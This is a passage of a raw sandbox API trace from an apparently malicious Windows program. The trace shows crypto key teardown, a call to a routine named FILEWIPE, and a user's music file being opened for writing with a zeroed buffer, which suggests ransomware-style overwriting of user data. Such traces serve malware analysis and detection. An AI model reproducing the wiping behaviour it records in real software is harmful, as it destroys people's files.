1 [0188.218] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.218] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.218] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.218] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.218] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0188.219] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.228] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.228] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.228] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.235] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0188.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.235] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.235] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.235] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0188.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.235] CryptDestroyKey (hKey=0x90af98) returned 1 [0188.236] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.236] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.236] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0188.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.236] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.236] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0188.236] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0188.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.236] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.236] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0188.236] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0188.236] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.237] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.237] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.237] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.237] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0188.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.237] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.237] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.237] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.237] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.237] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.237] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.237] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.237] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.238] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.238] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0188.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.238] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.238] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0188.238] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.238] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.239] FreeLibrary (hLibModule=0x74f20000) returned 1 [0188.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0188.239] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0188.239] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0188.239] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.239] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.240] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.241] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.241] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0188.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0188.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.241] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.241] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.241] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93ad500, ftCreationTime.dwHighDateTime=0x1d5e750, ftLastAccessTime.dwLowDateTime=0xa9281650, ftLastAccessTime.dwHighDateTime=0x1d5da16, ftLastWriteTime.dwLowDateTime=0xa9281650, ftLastWriteTime.dwHighDateTime=0x1d5da16, nFileSizeHigh=0x0, nFileSizeLow=0x14415, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RPbhRyzIp5Cjl.mp3", cAlternateFileName="RPBHRY~1.MP3")) returned 0x90af58 [0188.241] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0188.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0188.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.242] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.242] CharLowerBuffW (in: lpsz="byte[82965]", cchLength=0xb | out: lpsz="byte[82965]") returned 0xb [0188.242] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.242] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0188.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.242] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.242] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0188.243] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0188.243] FreeLibrary (hLibModule=0x75c90000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.244] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.244] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.244] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.244] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0188.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.245] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0188.246] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rpbhryzip5cjl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0188.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0188.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0188.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0188.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.246] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.246] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.247] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.247] RtlAllocateHeap 